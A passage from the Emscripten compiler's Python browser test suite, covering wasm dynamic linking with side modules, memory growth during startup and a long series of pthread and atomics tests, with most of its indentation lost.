self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
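  # Test dynamic linking against a wasm side module that is loaded at startup via Module.dynamicLibraries.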
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
def test_dylink_dso_needed(self):
self._run_dylink_dso_needed(0)
def test_dylink_dso_needed_inworker(self):
self._run_dylink_dso_needed(1)
def _run_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
def do_run(src, expected_output):
      # XXX there is no infrastructure (yet?) to retrieve stdout from the browser in tests.
      # -> do the assert about expected output inside the browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
src += r'''
#include <emscripten/em_asm.h>
int main() {
test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
REPORT_RESULT(0);
}
''' % (expected_output,)
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
self.btest(src, '0', args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_test_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_test_file('side1.c', r'''
int side1() { return 1; }
''')
create_test_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE=1', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE=1', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), '3',
args=['-s', 'MAIN_MODULE=1', '--pre-js', 'pre.js'])
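  # Preload a data file larger than INITIAL_MEMORY so that the heap must grow while the runtime is still starting up.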
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
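  # Prepare an HTML shell in which SharedArrayBuffer and Atomics are hidden, to simulate a browser without shared memory support.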
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_c11_threads.c'),
expected='0',
force_c=True,
args=['-g4', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure', '1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS=1', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
  # Tests the remaining GCC atomics after the two tests above.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
    # TODO: re-enable minimal runtime once the flakiness is figured out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME=1'])
  # Test that preallocating worker threads works.
@requires_threads
def test_pthread_preallocates_workers(self):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD=1'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
    self.btest(path_from_root('tests', 'pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
  @no_chrome('pthread_kill hangs the chrome renderer, and keeps subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--closure', '1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
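  # For illustration, a rough sketch (hypothetical code, not the actual test source) of the
  # volatile-flag control scheme this exercises:
  #
  #   volatile int keep_running = 1;          // main thread flips this to stop the worker
  #   void *worker(void *arg) {
  #     while (keep_running) { /* spin / do work */ }
  #     return 0;
  #   }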
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS=1'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(path_from_root('tests', 'unistd', 'io.c'), 0, args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
  # Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), this does not deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
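  # Rough sketch of what "fails gracefully" means for user code (hypothetical snippet, not the
  # actual test source): with -s ABORTING_MALLOC=0, an oversized allocation is expected to report
  # failure instead of abort()ing the program:
  #
  #   void *p = malloc(512 * 1024 * 1024);    // size chosen arbitrarily for illustration
  #   if (!p) { /* handle the failure; the runtime did not abort */ }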
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(path_from_root('tests', 'pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
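  # Rough sketch of the call under test (hypothetical snippet; assumes the emscripten_futex_wake()
  # declaration from emscripten/threading.h, with futex_var being a shared address waiters sleep on):
  #
  #   emscripten_futex_wake(&futex_var, INT_MAX);   // INT_MAX requests waking every waiter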
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME=1'], also_asmjs=True)
